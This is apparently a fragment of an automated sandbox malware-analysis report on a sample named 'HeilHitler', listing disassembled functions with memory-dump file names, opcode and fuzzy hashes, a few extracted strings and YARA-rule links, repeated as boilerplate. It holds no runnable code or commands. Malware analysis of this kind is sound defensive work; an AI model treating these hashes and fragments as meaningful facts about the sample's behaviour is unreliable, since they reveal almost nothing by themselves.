                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: $
                                                                                                                                                                                                                                            • API String ID: 0-227171996
                                                                                                                                                                                                                                            • Opcode ID: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                                                                                                                                                                            • Instruction ID: 941d691bc12832f5ad2a35e5a9a8742a78fe2f01aa385eaf28c3d6953731b557
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e57f1980f4491aea9eb328a1e81193c2bccc9a7e68d1918bb9b7207cf9600634
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ACE1C632A0864686EB68CFA9C05717D33A0FF45B48F145335DA4EA7B94DF3AE851E780
                                                                                                                                                                                                                                            Function 00007FF633D6A2DB Relevance: 2.7, Strings: 2, Instructions: 218COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                                            • API String ID: 0-900081337
                                                                                                                                                                                                                                            • Opcode ID: e8ec78490181e4ccec650f854842bb3e08bcfae3bf2db5596c2af0d8e2ff5899
                                                                                                                                                                                                                                            • Instruction ID: a5b1a32b988a1dfaee414ac612ee252df55af265210d1dbb2408b33029765b12
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e8ec78490181e4ccec650f854842bb3e08bcfae3bf2db5596c2af0d8e2ff5899
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2591B7B2A182C68BE7A48E55D449B3E3BA9FF44350F514239DA9ED67C0CF38E940DB40
                                                                                                                                                                                                                                            Function 00007FF633D7DEF0 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: e+000$gfff
                                                                                                                                                                                                                                            • API String ID: 0-3030954782
                                                                                                                                                                                                                                            • Opcode ID: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                                                                                                                                                            • Instruction ID: 31c70923b9f728e13ae4adc20dc85de8e43d46ea70eeef49d09ae9247647c225
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8a24eaff8c968987b4d031b15ae93849e98bcf9eddb8930961e84febef9b5bc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D518862B182C186E7258EB5D812769BB91F744B94F488332CB9C8BBD5CF3ED041D700
                                                                                                                                                                                                                                            Function 00007FF633D808C8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1010374628-0
                                                                                                                                                                                                                                            • Opcode ID: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                                                                                                                                                            • Instruction ID: 234171ecab6d92aafaa5d4a9909603b3ea14021a6af1ef4328636cb80422da9e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 537422541fbed36a77ddee3a41e978a3695e14332b64c7d8d0a2d6c09592a1ae
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5702EF61B1D74350FA61AF92A80327A6684AF41BA0F459734ED6DFA7D2DF3DF411A300
                                                                                                                                                                                                                                            Function 00007FF633D7DA5C Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: gfffffff
                                                                                                                                                                                                                                            • API String ID: 0-1523873471
                                                                                                                                                                                                                                            • Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                            • Instruction ID: 1afcbe67ad50fea2a5efa46d0a5b7482042ace8cca7d52410eae63c1471e1b2d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46A16762B0C7CA86EB21CF69A4017AA7B91EB54B84F058232DE8D97789DE7DE401D701
                                                                                                                                                                                                                                            Function 00007FF633D78794 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID: TMP
                                                                                                                                                                                                                                            • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                                            • Opcode ID: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
                                                                                                                                                                                                                                            • Instruction ID: c73461b15bf410eda73629d3ab9e166dab471a7856efec368c98aa0154453f25
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 09cdd7cf7fc9e7e425d724a32e8c9d3bd5c12dba7606eca5b930980d9b4d1239
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A851EF01F0964341FA64AFA769131BA9290AF44BD5F884235DE0EF7BD6EF3CF446A200
                                                                                                                                                                                                                                            Function 00007FF633D83480 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: HeapProcess
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 54951025-0
                                                                                                                                                                                                                                            • Opcode ID: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                                                                                                                                                            • Instruction ID: 23a663a901f2a26b996bdb03eeab635ea266c1f41e8bf6faf2c2a278b59d33ac
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f9e0516fd534d967cb731c121838b59470578846d262458ea046ba55ab40ebf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C3B09220E07A02C2EA082BA16C8331822A57F48700F980238C45CA4330DE2C22E66700
                                                                                                                                                                                                                                            Function 00007FF633D735A0 Relevance: .3, Instructions: 327COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                                                                                                                                                                                                            • Instruction ID: 6ad6a375d7b48f2d1fbf935b8adf388753954b97d725c2e4a6a2f07d9ead4fbf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5eca4e5ff3e7205525bf20f3b63783aa462e3e7adb0228d62bb7e98ab9f5e9bb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1FD1D972A0865286EB788EA9805227D27A0FF05B48F144339CE0DA7FD5DF3DE845E780
                                                                                                                                                                                                                                            Function 00007FF633D69800 Relevance: .3, Instructions: 287COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                                                                                                                                                                                                            • Instruction ID: 35ed4605ba5d38fd2fb0c3e6fe719fc7ac49ec01588e6af8a2429ab66c0113ab
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e75d751cc15dfd510e55d83c6141b0e8cb11d18cbed01e0c543b372a0114c593
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F1C18E762181E08BD28AEB29E46947A73D1F78930DBD5416BEF87477C5CB3CA414EB10
                                                                                                                                                                                                                                            Function 00007FF633D72C10 Relevance: .2, Instructions: 241COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                                                                                                                                                                                                            • Instruction ID: 9af360680d7e93afb08e8858cfa49cdc6dbfca5280bc287a640f8b7e9b6653cf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aa73bfa000bc8cd66a05f12d530b76a597660d7bda6a6781f52cf2f49ffced0b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FAB17D7291878585E7648F79C05223C3BB0FB49F48F284239CA4EA7395CF39D841E744
                                                                                                                                                                                                                                            Function 00007FF633D7E570 Relevance: .2, Instructions: 198COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
                                                                                                                                                                                                                                            • Instruction ID: f3a369d03b68085ac22b09b61201810031b7f63a1375baeb0e366a9fb982d0b8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9611c2e0762efa78d7f6da3d8515592aa8d86601c49200b7335873453b670326
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D81F572A0C78186EB74CF5994823BA7A91FB857D4F544335DA8D93BA9DF3DE400AB00
                                                                                                                                                                                                                                            Function 00007FF633D86418 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                            • Opcode ID: c4c9f5a32dfdae123a950871ad542e5144b1bba19a2b1a1cf20ca827a7dd530f
                                                                                                                                                                                                                                            • Instruction ID: f8bae45af86551e0194db111c754791c73dc4c96138ac3f38f0d6abbe4242f21
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c4c9f5a32dfdae123a950871ad542e5144b1bba19a2b1a1cf20ca827a7dd530f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6961F022E0D2964AFB648EB8945363D6680AF40770F541379EB1DEBBD5EE7DF800A700
                                                                                                                                                                                                                                            Function 00007FF633D72164 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                            • Instruction ID: 4a28df46d5ecbcf5a5b662d41b55069c4563ffd3c99766e25f743ff52653e9dd
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 94519336A1869586E7248F69C44223833A1FB54B68F284235CE8DA7794CF3AE943E740
                                                                                                                                                                                                                                            Function 00007FF633D71944 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                            • Instruction ID: 90475f0fd0d7d088c2114eb0507e0294339e14a51f3425513cb590e4e8a7c3a8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E351A176A1865186E7248F69C04627837A0FB45F68F244331CE9DA77A4DF3AE843E740
                                                                                                                                                                                                                                            Function 00007FF633D71D54 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044948502.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                            • Instruction ID: 8c8c53186f5a4a86dfade6a52309069fc3799063abd488257601886f5d61ad5f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0518376A28A5182E7248F69C04137837A1EB45F68F244331DE8DA7795DF3AE853DB40
                                                                                                                                                                                                                                            Function 00007FF633D71B50 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2044747712.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044699200.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044805928.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2044858286.00007FF633DA2000.00000004.00000001.01000000.00000003.sdmpDownload File
